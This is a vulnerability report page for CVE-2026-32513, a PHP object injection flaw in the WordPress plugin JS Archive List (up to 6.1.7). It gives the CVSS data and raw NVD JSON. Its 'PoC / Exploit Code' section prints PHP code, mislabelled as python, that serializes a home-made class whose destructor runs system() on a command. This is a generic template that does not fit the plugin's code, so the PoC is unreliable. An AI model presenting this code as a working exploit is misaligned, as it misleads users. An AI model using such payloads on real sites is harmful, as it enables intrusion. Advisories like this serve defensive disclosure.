Security Vulnerability Report
中文
CVE-2026-32513 CVSS 8.8 HIGH

CVE-2026-32513

Published: 2026-03-25 17:17:04
Last Modified: 2026-04-24 16:35:20

Description

Deserialization of Untrusted Data vulnerability in Miguel Useche JS Archive List jquery-archive-list-widget allows Object Injection.This issue affects JS Archive List: from n/a through <= 6.1.7.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

JS Archive List <= 6.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // Proof of Concept for PHP Object Injection // This script generates a serialized payload to exploit the vulnerability. class Exploit { public $cmd; public function __destruct() { // Simulating code execution via system call if (isset($this->cmd)) { system($this->cmd); } } } // Create the payload object $payload = new Exploit(); $payload->cmd = 'touch /tmp/pwned'; // Malicious command // Generate the serialized string $serialized_payload = serialize($payload); echo "Generated Payload:\n" . $serialized_payload . "\n"; // Usage: Send the $serialized_payload to the vulnerable endpoint via POST/GET ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32513", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:17:03.683", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in Miguel Useche JS Archive List jquery-archive-list-widget allows Object Injection.This issue affects JS Archive List: from n/a through <= 6.1.7."}, {"lang": "es", "value": "Vulnerabilidad de deserialización de datos no confiables en Miguel Useche JS Archive List jquery-archive-list-widget permite la inyección de objetos. Este problema afecta a JS Archive List: desde n/a hasta &lt;= 6.1.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/jquery-archive-list-widget/vulnerability/wordpress-js-archive-list-plugin-6-1-7-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}